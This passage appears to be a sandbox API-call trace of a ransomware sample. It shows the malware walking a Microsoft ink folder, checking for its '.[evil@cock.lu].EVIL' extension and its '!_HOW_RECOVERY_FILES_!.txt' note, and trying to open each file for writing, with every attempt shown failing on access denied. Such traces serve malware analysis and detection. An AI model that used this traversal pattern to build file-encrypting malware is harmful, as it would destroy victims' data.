returned 0 [0088.427] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.427] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.427] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 57 [0088.427] wcscmp (_String1=".", _String2="en-US") returned -1 [0088.427] wcscmp (_String1="..", _String2="en-US") returned -1 [0088.427] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 0x39 [0088.427] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 0x0 [0088.427] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*" [0088.427] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd140 [0088.428] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.428] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.") returned 59 [0088.428] wcscmp (_String1=".", _String2=".") returned 0 [0088.428] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.428] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.428] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\..") returned 60 [0088.428] wcscmp (_String1=".", _String2="..") returned -1 [0088.428] wcscmp (_String1="..", _String2="..") returned 0 [0088.428] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.428] wcsstr (_Str="boxed-correct.avi", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.428] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 75 [0088.428] wcscmp (_String1="boxed-correct.avi", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.428] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="boxed-correct.avi") returned 0x0 [0088.428] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 0x4b [0088.429] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.429] GetLastError () returned 0x5 [0088.429] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.429] wcsstr (_Str="boxed-delete.avi", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.429] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 74 [0088.429] wcscmp (_String1="boxed-delete.avi", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.429] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="boxed-delete.avi") returned 0x0 [0088.429] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi") returned 0x4a [0088.429] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.429] GetLastError () returned 0x5 [0088.429] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.429] wcsstr (_Str="boxed-join.avi", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.429] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 72 [0088.429] wcscmp (_String1="boxed-join.avi", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.429] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="boxed-join.avi") returned 0x0 [0088.429] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi") returned 0x48 [0088.429] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.430] GetLastError () returned 0x5 [0088.430] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.430] wcsstr (_Str="boxed-split.avi", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.430] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 73 [0088.430] wcscmp (_String1="boxed-split.avi", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.430] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="boxed-split.avi") returned 0x0 [0088.430] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 0x49 [0088.430] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.430] GetLastError () returned 0x5 [0088.430] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.430] wcsstr (_Str="correct.avi", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.430] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 69 [0088.430] wcscmp (_String1="correct.avi", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.430] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="correct.avi") returned 0x0 [0088.430] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 0x45 [0088.430] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.445] GetLastError () returned 0x5 [0088.445] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.445] wcsstr (_Str="delete.avi", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.445] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 68 [0088.445] wcscmp (_String1="delete.avi", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.445] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="delete.avi") returned 0x0 [0088.445] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 0x44 [0088.445] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.446] GetLastError () returned 0x5 [0088.446] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.446] wcsstr (_Str="FlickLearningWizard.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.446] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 85 [0088.446] wcscmp (_String1="FlickLearningWizard.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.446] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="FlickLearningWizard.exe.mui") returned 0x0 [0088.446] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 0x55 [0088.446] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.446] GetLastError () returned 0x5 [0088.446] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.446] wcsstr (_Str="InkObj.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.446] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned 72 [0088.446] wcscmp (_String1="InkObj.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.446] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="InkObj.dll.mui") returned 0x0 [0088.446] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned 0x48 [0088.446] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.446] GetLastError () returned 0x5 [0088.446] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.446] wcsstr (_Str="InputPersonalization.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.446] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 86 [0088.446] wcscmp (_String1="InputPersonalization.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.446] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="InputPersonalization.exe.mui") returned 0x0 [0088.446] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui") returned 0x56 [0088.446] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InputPersonalization.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inputpersonalization.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.447] GetLastError () returned 0x5 [0088.447] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.447] wcsstr (_Str="IPSEventLogMsg.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.447] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 80 [0088.447] wcscmp (_String1="IPSEventLogMsg.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.447] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IPSEventLogMsg.dll.mui") returned 0x0 [0088.447] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui") returned 0x50 [0088.447] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IPSEventLogMsg.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipseventlogmsg.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.448] GetLastError () returned 0x5 [0088.448] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.448] wcsstr (_Str="IpsMigrationPlugin.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.448] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 84 [0088.448] wcscmp (_String1="IpsMigrationPlugin.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.448] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IpsMigrationPlugin.dll.mui") returned 0x0 [0088.448] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 0x54 [0088.448] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.448] GetLastError () returned 0x5 [0088.448] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.448] wcsstr (_Str="join.avi", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.448] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 66 [0088.448] wcscmp (_String1="join.avi", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.448] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="join.avi") returned 0x0 [0088.448] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 0x42 [0088.449] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.449] GetLastError () returned 0x5 [0088.449] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.449] wcsstr (_Str="micaut.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.449] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned 72 [0088.449] wcscmp (_String1="micaut.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.449] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="micaut.dll.mui") returned 0x0 [0088.449] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui") returned 0x48 [0088.449] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.449] GetLastError () returned 0x5 [0088.449] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.449] wcsstr (_Str="mip.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.449] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned 69 [0088.449] wcscmp (_String1="mip.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.449] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mip.exe.mui") returned 0x0 [0088.449] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui") returned 0x45 [0088.450] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.450] GetLastError () returned 0x5 [0088.450] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.450] wcsstr (_Str="mshwLatin.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.450] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned 75 [0088.450] wcscmp (_String1="mshwLatin.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.450] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="mshwLatin.dll.mui") returned 0x0 [0088.450] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui") returned 0x4b [0088.450] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.450] GetLastError () returned 0x5 [0088.450] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.450] wcsstr (_Str="rtscom.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.450] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned 72 [0088.450] wcscmp (_String1="rtscom.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.450] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="rtscom.dll.mui") returned 0x0 [0088.450] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned 0x48 [0088.450] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.450] GetLastError () returned 0x5 [0088.450] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.450] wcsstr (_Str="ShapeCollector.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.450] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 80 [0088.451] wcscmp (_String1="ShapeCollector.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.451] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ShapeCollector.exe.mui") returned 0x0 [0088.451] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 0x50 [0088.451] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.451] GetLastError () returned 0x5 [0088.451] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.451] wcsstr (_Str="split.avi", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.451] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 67 [0088.451] wcscmp (_String1="split.avi", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.451] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="split.avi") returned 0x0 [0088.451] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi") returned 0x43 [0088.451] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.452] GetLastError () returned 0x5 [0088.452] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.452] wcsstr (_Str="tabskb.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.452] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 72 [0088.452] wcscmp (_String1="tabskb.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.452] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tabskb.dll.mui") returned 0x0 [0088.452] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui") returned 0x48 [0088.452] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.452] GetLastError () returned 0x5 [0088.452] FindNextFileW (in: hFindFile=0x84b11dd140, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.452] wcsstr (_Str="TabTip.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.452] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui") returned 72 [0088.452] wcscmp (_String1="TabTip.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.452] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="TabTip.exe.mui") returned 0x0 [0088.452] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TabTip.exe.mui") returned 0x48 [0088.452] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft 